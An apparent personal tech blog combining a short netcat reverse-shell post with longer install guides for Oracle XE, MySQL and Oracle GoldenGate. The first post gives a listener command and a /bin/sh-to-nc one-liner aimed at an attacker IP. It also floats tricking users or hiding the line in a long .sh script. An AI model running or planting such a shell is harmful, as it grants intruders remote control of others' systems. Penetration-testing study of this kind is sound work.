Reverse Shell with Netcat

I’ve been exploring different tools to simulate hacking a system and practice penetration testing. Probably, one of the tools that I find most useful (aside from nmap) is the command netcat. This utility is used to read and write data across network connections. I find it interesting that you can actually open up a command shell (or reverse shell) to a remote computer. Upon research (, you can open up a shell by running the following commands:

From the attacker’s computer, he can open up a listening port:

nc -nvlp 9999                         where 9999 is any port

On the target’s computer, if he can have the following commands executed by either tricking the user or by executing the code through a web application:

mknod /tmp/backpipe p

/bin/sh 0</tmp/backpipe | nc <attackers_ip> 9999 1>/tmp/backpipe

Once, the code is executed on the target, you will see confirmation in the attacker’s shell that a connection has been made. From their, you can executed the usual Linux commands. Take note that it might appear as a blank screen, but in that blank screen, treat it as a Linux shell. That is, type Linux commands and you will see the output.

Now I am exploring other ways to open up a remote shell using the tools readily available on every OS. Probably one of the biggest challenge is how to execute those commands in the victim’s computer. Probably, compromising a .sh script would do. Probably in a very long .sh script such commonly used commands, somehow append the <pipe commands> and add & on it. For the sake of opening ideas in the world of penetration testing, I’ll play around and see if it works.

Installing Oracle 11g Release 2 Express Edition in Ubuntu 13.04 (Unsupported OS)

I am going to demonstrate how to install Oracle 11gR2 Express Edition in Ubuntu 13.04. Take note that Ubuntu is not supported by Oracle but I will still attempt to install the platform. I used the following source as basis for my installation:

Make sure you download Oracle11g Release 2 Express Edition x64 (The only available cpu architecture for XE edition) and placing it in a directory that you can work on before proceeding further:

Installation prerequisites:

1. Install the needed packages:
shell> sudo apt-get install alien libaio1 unixodbc vim

2. While downloading the packages, you can also unzip the Oracle database file you’ve just downloaded earlier as both will take some time:
shell> unzip

3. Next, we need to convert the .rpm file to .deb file with the following command:
shell> sudo alien –scripts -d oracle-xe-11.2.0-1.0.x86_64.rpm

While doing this step, you may proceed to the next step at this may take time:

Pre-installation configuration

1. We will create a special chkconfig script in this step.The Red Hat based installer of Oracle XE 11gR2 relies on /sbin/chkconfig, which is not used in Ubuntu. The chkconfig package available for the current version of Ubuntu produces errors and my not be safe to use. Based on the source I followed, below is a simple trick to get around the problem and install Oracle XE successfully:

shell> sudo vim /sbin/chkconfig
(copy and paste the following into the file )
# Oracle 11gR2 XE installer chkconfig hack for Ubuntu
file=/etc/init.d/oracle-xe if [[ ! `tail -n1 $file | grep INIT` ]]; then
echo >> $file
echo ‘### BEGIN INIT INFO’ >> $file
echo ‘# Provides: OracleXE’ >> $file
echo ‘# Required-Start: $remote_fs $syslog’ >> $file
echo ‘# Required-Stop: $remote_fs $syslog’ >> $file
echo ‘# Default-Start: 2 3 4 5’ >> $file
echo ‘# Default-Stop: 0 1 6’ >> $file
echo ‘# Short-Description: Oracle 11g Express Edition’ >> $file
echo ‘### END INIT INFO’ >> $file fi update-rc.d oracle-xe defaults 80 01
Save the above file and provide appropriate execute privilege :
shell> sudo chmod 755 /sbin/chkconfig
2. Set the Kernel parameters :

Oracle 11gR2 XE requires to set the following additional kernel parameters:
shell> sudo vim /etc/sysctl.d/60-oracle.conf
(Enter the following) :
# Oracle 11g XE kernel parameters
net.ipv4.ip_local_port_range=9000 65000
kernel.sem=250 32000 100 128
(Save the file)
Note: kernel.shmmax = max possible value , e.g. size of physical RAM ( in bytes e.g. 512MB RAM == 512*1024*1024 == 536870912 bytes )
Verify the change :
shell> sudo cat /etc/sysctl.d/60-oracle.conf
Load new kernel parameters:
shell> sudo service procps start
Verify: sudo sysctl -q fs.file-max
This should come out: fs.file-max = 6815744
3. Increase the system swap space : Analyze your current swap space by following command :

shell> free -m
**Swapfile Notes: Minimum swap space requirement of Oracle 11gR2 XE is 2 GB . In case, your is lesser , you can increase it by following steps (Mine is originally 1GB only):
a) switch to root and perform the following commands:
shell> su root
shell> dd if=/dev/zero of=/swapfile bs=1024 count=2097152 (Preferably, you should set the count to 1048576. This will add to the current total of 1GB = 2GB. Mine totalled to 3GB)
shell> mkswap /swapfile
shell> swapon /swapfile
shell> cp /etc/fstab /etc/fstab.orig (This is for backup of the original fstab)
shell> echo ‘/swapfile swap swap defaults 0 0’>> /etc/fstab (Adds the entry of new swap to fstab upon boot)
Verify with:
shell> swapon -a; swapon -s

Just in case you want to revert to the original config, perform the following:
shell> sudo swapoff -a
shell> sudo rm /swapfile

shell> sudo cp /etc/fstab /etc/fstab.changed; sudo cp /etc/ /etc/fstab
shell> sudo swapon -a; swapon -s

End of Swapfile Notes**

We need to make some additional required changes :
shell> ln -s /usr/bin/awk /bin/awk
shell> mkdir /var/lock/subsys
shell> touch /var/lock/subsys/listener
Installation of Oracle 11gR2 XE
1. Going back to the directory where we converted the installation package of Oracle XE, we perform the following commands to install the package:
shell> sudo dpkg –install oracle-xe_11.2.0-2_amd64.deb
(Note: If you encounter any ‘shared memory’ error or anything related to memory, look through for more information.)
shell> sudo /etc/init.d/oracle-xe configure
Enter the following configuration information:
  • A valid HTTP port for the Oracle Application Express (the default is 8080)
  • A valid port for the Oracle database listener (the default is 1521)
  • A password for the SYS and SYSTEM administrative user accounts
  • Confirm password for SYS and SYSTEM administrative user accounts
  • Whether you want the database to start automatically when the computer starts (next reboot).

Note: I pretty much used the default configuration here except for the password of course

IMPORTANT: If the previous step or the configuration fails to complete, then you may have encountered the problem in which the link above was created for. The author explained in the link above the reason for the failure. Nevertheless, you will need to reinstall the package again. This happened to me. I followed the troubleshooting guide created by the author and everything went well afterwards.

2. We need to set up the environment variables to ensure the database will run. Add the following env variables to the .bashrc:
shell> vi ~/.bashrc
shell> export ORACLE_HOME=/u01/app/oracle/product/11.2.0/xe
shell> export ORACLE_SID=XE
shell> export NLS_LANG=`$ORACLE_HOME/bin/`
shell> export ORACLE_BASE=/u01/app/oracle
shell> export PATH=$ORACLE_HOME/bin:$PATH

3. Load the changes:
shell> . ./.profile (from root or just type cd before this command)
shell> sudo service oracle-xe start (mine is running already)

Configuring User Accounts in Oracle 11gR2 XE

1. Login in the database as follows:

shell> sqlplus / as sysdba
Note: If you get the error ORA-01031: insufficient privileges after the above command, it means you need to add your user in the dba group. Perform the following:
shell> su root
shell> vim /etc/group
Add your user name at the end of dba:x:1001: like

2. Create a user account using the following commands:
sqlplus> create user <username> identified by <password>;
sqlplus> grant connect, resource to <username>;

3. Now try logging in to that user account using the username you’ve just created:
shell> sqlplus
Enter username:
Enter password:

Easy installation of MySQL in Linux Mint 15

The recommended database client for database novices is MySQL. Being a light database, MySQL is easy to use and configure. Also, distributions such as Debian-based Linux Mint already have packages ready to be installed from the default repository. In this post, let me demonstrate how I installed MySQL:

Steps taken to install MySQL in Linux Mint:

1. Download MySQL client:
bash> apt-get install mysql-client

2. Download MySQL server:
bash> apt-get install mysql-server
Note: During installation of mysql-server, you will prompted to enter the root password. It is recommended to set it up.

3. Test if installation is successful using the following commands:
bash> /usr/bin/mysqladmin version
bash> /usr/bin/mysqladmin variables
Note: You should see an output showing details regarding mysql

4. Upon installation of mysql, a database named ‘test’ is already created by default. Test connection by connecting to the database
bash> mysql -u test
You can now connect to the database

5. You can add user accounts using the following commands:
bash> mysql -u root -p                   —–> (log in as root first)
mysql> GRANT USAGE ON test.* TO user@localhost
-> IDENTIFIED BY ‘test’;
This creates an account named ‘user’ with the password ‘test’ on the database named test and all the tables (denoted by *).

Additional Options:
You can also grant priveleges to user accounts:
mysql> GRANT SELECT ON test.* TO user@localhost
This gives the account ‘user’ read priveleges (SELECT Statement) to the database ‘test’ with password ‘pwd’.
If you want the user full control over the database, you can also do:
mysql> GRANT ALL ON test.* TO user@localhost

Integrating Oracle Goldengate 11 with MySQL in Windows 7


Installing Oracle Goldengate (OGG) in Windows 7 is pretty much easier than Linux because most configurations are done via GUI tools:


1. Download and install MySQL client (I download mine via the MySQL Workbench)

2. Download and install MySQL ODBC driver (This is to ensure Windows 7 is able to communicate with the MySQL database)

3. Download and extract GoldenGate for Windows 7 in a folder

During installation of MySQL, I made the settings as default to simplify the process but you may go change certain options if you like. Just make sure that you remember the port you assign to MySQL (default is 3306).

The scenario I am going to demonstrate is for initial loading. This means migration a table from a database to an empty table in another database. Usually, the other database would be located on a remote location. But for this example, I will be using a loopback address meaning both source and target tables are in the same system.


Locate the installation folder of MySQL and look for the file my.ini (In Windows x64, it could have several folders located in ProgramData, Program Files (x84) or Program Files, make sure you ONLY have one folder containing the configuration file my.ini). MySQL can get confused if more than one my.ini exists in the folder. Mine is located in Program Files. If two my.ini files exist in two different folders, make sure at least that both have the same contents.

1. Open my.ini with a text editor and look for [mysqld] and enter the following lines:

log-bin = “C:/Program Files/MySQL/MySQL Server 5.6/log/localhost.bin”

Notes: MySQL usually reads the transaction log files to do the changes. It’s best to set this up early. However, the example I am going to demonstrate should directly obtain the data from the tables themselves.mysqld

2. After extracting the Goldengate files in a folder, open the Goldengate directory and look for the ggsci.exe program. Run it and a command line should pop up, enter CREATE SUBDIRS in the command line to create the folders it needs.


1. Create a database in MySQL as your source database. It should contain at least one table, Preferably, use a script just in case you mess up your configuration later on. MySQL makes this easy by saving your scripts. As an example, I used the following script to create a source table named ‘project’ and a table ‘nbarankings2013’:

USE project;


CREATE TABLE NBArankings2013(
NBATeam varchar(255) NOT NULL,
Division varchar(255) NOT NULL,
WinPerc decimal(8,3) NOT NULL, GB  decimal(8,1) NOT NULL,
Conference varchar(255) NOT NULL,

INSERT INTO NBArankings2013 (NBATeam, Division, WinPerc, GB, Conference)
VALUES (‘New York’, ‘Atlantic’, ‘0.659’, ’12’, ‘East’),
(‘Brooklyn’, ‘Atlantic’, ‘0.598’, ’17’, ‘East’),
(‘Boston’, ‘Atlantic’, ‘0.506’, ‘24.5’, ‘East’),
(‘Philadelphia’, ‘Atlantic’, ‘0.415’, ’32’, ‘East’),
(‘Toronto’, ‘Atlantic’, ‘0.415’, ’32’, ‘East’),
(‘Indiana’, ‘Central’, ‘0.605’, ‘16.5’, ‘East’),
(‘Chicago’, ‘Central’, ‘0.549’, ’21’, ‘East’),
(‘Milwaukee’, ‘Central’, ‘0.463’, ’28’, ‘East’),
(‘Detriot’, ‘Central’, ‘0.354’, ’37’, ‘East’),
(‘Cleveland’, ‘Central’, ‘0.293’, ’42’, ‘East’),
(‘Miami’, ‘Southeast’, ‘0.805’, ‘0’, ‘East’),
(‘Atlanta’, ‘Southeast’, ‘0.537’, ’22’, ‘East’),
(‘Washington’, ‘Southeast’, ‘0.354’, ’37’, ‘East’),
(‘Charlotte’, ‘Southeast’, ‘0.256’, ’45’, ‘East’),
(‘Orlando’, ‘Southeast’, ‘0.244’, ’46’, ‘East’),
(‘San Antonio’, ‘Southwest’, ‘0.707’, ‘2’, ‘West’),
(‘Memphis’, ‘Southwest’, ‘0.683’, ‘4’, ‘West’),
(‘Houston’, ‘Southwest’, ‘0.549’, ’15’, ‘West’),
(‘Dallas’, ‘Southwest’, ‘0.5’, ’19’, ‘West’),
(‘New Orleans’, ‘Southwest’, ‘0.329’, ’33’, ‘West’),
(‘Oklahoma City’, ‘Northwest’, ‘0.732’, ‘0’, ‘West’),
(‘Denver’, ‘Northwest’, ‘0.695’, ‘3’, ‘West’),
(‘Utah’, ‘Northwest’, ‘0.524’, ’17’, ‘West’),
(‘Portland’, ‘Northwest’, ‘0.402’, ’27’, ‘West’),
(‘Minnesota’, ‘Northwest’, ‘0.376’, ’29’, ‘West’),
(‘LA Clippers’, ‘Pacific’, ‘0.683’, ‘4’, ‘West’),
(‘Golden State’, ‘Pacific’, ‘0.573’, ’13’, ‘West’),
(‘LA Lakers’, ‘Pacific’, ‘0.549’, ’15’, ‘West’),
(‘Sacramento’, ‘Pacific’, ‘0.341’, ’32’, ‘West’),
(‘Phoenix’, ‘Pacific’, ‘0.305’, ’35’, ‘West’);

FROM nbarankings2013

Using MySQL is pretty easy, I am sure you can configure things by yourself. Create another database which will be your target database. Create an empty table with the same name as the table I used above. In this case, I used a target database named ‘projectext’ containing a table ‘nbarankings2013’.

Open up the MySQL command line and confirm that the table from projectext, the target database, is empty:

MySQL> SELECT * FROM nbarankings2013;


1. Open Data Source (ODBC) panel by typing Data Source in the search bar of Windows
2. Create a new connection to the source database by pressing Add and choosing the MySQL driver you’ve installed. Fill out the details, make sure you are using the correct TCP/IP settings. In my case, I used and 3306 as server and port address, respectively. Use the username and password you use to connect to the database in MySQL (I’m pretty sure you’ve configured this when you created the database). Lastly, choose the source database.
3. Click the Test button to check connectivity.
4. Repeat the same setup using the target database this time.



1. Start ggsci.exe
2. In the command line, type EDIT PARAMS MGR. This should prompt you to create a new .rpm file which will hold the configuration file of the MGR process. For now, you only need one parameter written at the text file:
PORT 7089

3. type START MGR in the command line to start the manager process. Confirm this with INFO MGR.
4. Next create an Extract process named INITLOD1. Execute the following commands:
A new file with pop up and you need to fill out the configuration setup. I used the following:


SOURCEDB project, USERID root@project, PASSWORD ******
RMTFILE ./dirdat/el1.dat, PURGE
TABLE project.*;

5. Create the REPLICAT process. My configuration is as follows:



TARGETDB projectext, USERID root@projectext, PASSWORD Goldengate112! ASSUMETARGETDEFS
EXTFILE ./dirdat/el1.dat
DISCARDFILE ./dirrpt/el1.dsc, PURGE
MAP project.*, TARGET projectext.*;

5. To start the migration process or copying the table from project to the table in projectext, execute the following commands:

ggsci> START EXTRACT INITLOD1 (Several windows should pop up, wait for it to stop)
ggsci> VIEW REPORT INITLOD1 (Look at the bottom of the page if there is no error, if the process was successful, you should be able to see the Run Time Statistics. This tells us how many rows were copied)


Next run the replicat process:


Notes: You can also check with INFO ALL command to see if any of the processes has abended.


If all the processes executed with no problem, you should be able to see contents in the table from the target database (in my case, projectext should have received the data).

Execute the MySQL command line client:

MySQL> SELECT * FROM nbarankings2013;

The data should show up.

Integrating Oracle Goldengate 11 with Oracle Database 11g release2 in Oracle Enterprise Linux 6.4

I am writing these with the aim of giving other IT professionals some tip in installing this very unique and valuable product from Oracle. When I first integrated this program, I had to go through several sources and made several experiments as not all sources would have the same instance as mine. Make sure you read something about Goldengate first before proceeding. So with the hopes of helping other people, here are my steps in installing Oracle Golden Gate:

Steps taken to install Oracle Database 11G

1. Download Oracle Database 11GR2 and Goldengate from website.
2. Open terminal, switch to root. Perform the following commands
bash> cd /etc/yum.repos.d
bash> wget or (mine worked with the former)
bash> yum install oracle-rdbms-server-11gR2-preinstall

(See reference at the bottom of the page to see the purpose of this package)
3. bash> export DISTR=/home/dba/app/oracle -> shortcut to database directory -> DISTR disappearing when changing user (this is optional but makes things easier)
4. bash unzip and …
5. cd $DISTR/database and type ./runInstaller -> configured settings using the GUI setup
-> no email
-> Create and configure a database
-> Desktop class
-> Oracle base – /home/dba/app/dba
-> SW – /home/dba/app/dba/product/11.2.0/dbhome_1
-> DB – /home/dba/app/dba/oradata
-> Global database name – orcl
-> oraInventory – dba
-> prompted for missing dependencies -> installed missing dependencies

(In this step, you can pretty much configure the options from the GUI tool but see above for my configuration. You can also see my source from, see end of page, to see how he installed everything in one command)

6. At the end of the GUI installation, you may be prompted to install the missing dependencies. Use the command yum list | grep missingdependency to search for that dependency. For example,

bash> yum list | grep unixODBC -> yum install unixODBC-devel.x86_64
-> other missing dependencies are for i386 or i686 systems

In step 6, make sure you check each missing dependency and see if you need them. You’ll notice that some of them refer to specific cpu architecture. Check each dependency on your system if the one with the right architecture is installed. Sometimes, it may say that you haven’t installed the dependency. In my case I already installed unixODBC-devel.x86_64 but it says I haven’t installed unixODBC-devel.x86. If this happens just ignore the prompts for the missing dependencies IF you are sure you have already installed them.

7. Installation
-> executed scripts required by installer using sh (On this part, just follow the prompts from the installer. I used the command sh to install the scripts)
-> installation successful:
Enterprise Manager Database Control URL – (orcl):

Next I set up the environmental variables, make sure you point them to the right directory. We may have different directories.
8. export ORACLE_HOME=/home/dba/app/dba/product/11.2.0/dbhome_1
9. export PATH=$ORACLE_HOME/bin:$PATH
10. dbca -silent -createDatabase -templateName General_Purpose.dbc -gdbName base11r2 -sysPassword ***** -systemPassword ***** -emConfiguration NONE -datafileDestination /home/dba/app/oracle/oradata -storageType FS (This is to create a sample database)
11. lsnrtctl start (Starts up the listener)

Steps taken to install Oracle GoldenGate

1. Download Oracle GoldenGate 11g
2. extract folder to /home/dba/app/gg (using built-in Archive Manager) -> ogg11 folder created
3. export GGATE=/home/dba/app/dba/product/gg/ogg11 (again, this is optional but may simplify things)
4. tar -xf <goldengate>.tar
5. export LD_LIBRARY_PATH=$ORACLE_HOME/lib:/home/dba/app/dba/product/gg/ogg11 (This is very important, not setting this up will not make ./ggsci work)
6. bash> ./ggsci (This runs goldengate program and you will enter a command console for goldengate)
7. ggsci> create subdirs (This command creates needed folders for goldengate
8. exit

Preparing the replication process
1. verified vi tnsnames.ora (make sure the file exists)
2. export ORACLE_SID=base11r2 (this should refer to the name of the database, see step 10 from Installing Oracle Database)
3. run the shell and type sqlplus / as sysdba then:
a. sqlplus> shutdown immediate
b. sqlplus> startup mount
c. sqlplus> alter database archivelog;
d. sqlplus> alter database open;
e. sqlplus> alter database add supplemental log data;
f. sqlplus> alter system set recyclebin=off scope=spfile;
g. sqlplus> create user ggate identified by qwerty default tablespace users temporary tablespace temp; (user ggate created)
h. sqlplus> grant connect, resource, unlimited tablespace to ggate;
grant execute on utl_file to ggate; (priveleges granted to ggate)

**NOTE: goldengate directory should be located on the same directory for oracle scripts (inside installation of oracle DB)
4. run goldengate scripts inside sqlplus with schema ggate:
a. sqlplus> @$GGATE/marker_setup.sql
b. sqlplus> @$GGATE/ddl_setup.sql
c. sqlplus> @$GGATE/role_setup.sql
d. sqlplus> grant GGS_GGSUSER_ROLE to ggate;
e. sqlplus> @$GGATE/ddl_enable.sql
5. creating test schemas with schema sender to schema receiver
a. sqlplus> create user sender identified by qwerty default tablespace users temporary tablespace temp;
b. sqlplus> grant connect, resource, unlimited tablespace to sender;
c. sqlplus> create user receiver identified by qwerty default tablespace users temporary tablespace temp;
d. sqlplus> grant connect, resource, unlimited tablespace to receiver;

Configuring the processes in goldengate – take note that I am using localhost as both target and source system to demonstrate goldengate
Starting in source system:
1. bash> ./ggsci

ggsci> EDIT PARAMS MGR  (a .prm file will be created, in the file type PORT 7089)
2. ggsci> START MGR

ggsci>  INFO MGR (check if MGR is running)
4. ggsci> ADD EXTTRAIL /home/dba/app/dba/product/gg/ogg11/dirdat/el, extract INITLOD1
5. ggsci> EDIT PARAMS INITLOD1 (A new text file will open for the configuration, input the following)

USERID ggate, PASSWORD qwerty
RMTHOST localhost, MGRPORT 7089
RMTTRAIL /home/dba/app/dba/product/gg/ogg11/dirdat/el
TABLE sender.*;

(Save and close the file.)
Notes: INITLOD1 will be your extract process

For target system:
1. ggsci> EDIT PARAMS ./GLOBAL -> creates checkpoint table
2. ggsci> DBLOGIN USERID GGATE -> login successful
3. ggsci> ADD CHECKPOINTTABLE ggate.checkpoint
4. ggsci> ADD REPLICAT CHGSYNC, EXTTRAIL /home/dba/app/dba/product/gg/ogg11/dirdat/el, checkpointtable ggate.checkpoint
5. ggsci> EDIT PARAMS CHGSYNC (This will be your Replicat process)

USERID ggate, PASSWORD qwerty DISCARDFILE /home/dba/app/dba/product/gg/ogg11/discard/chgsync_discard.txt, APPEND, MEGABYTES 10

DDL MAP sender.*, TARGET receiver.*;

(Save and close the file.)


wait for a few seconds and check with INFO ALL, make sure MGR, EXTRACT and REPLICAT are running


Log in the database with the command sqlplus / as sysdba from the shell:
1. sqlplus> create table sender.test_table1 (id number, rnd_str varchar2(12));
2. sqlplus> insert into sender.test_table1 values (1, ‘test_1’);
3. sqlplus> commit; -> to save transaction
4. sqlplus> select * from receiver.test_table1;

Notes: After you insert a value on the database and commit the transaction in the sender.test_table1, you should be able to see those same values in the receiver.test_table2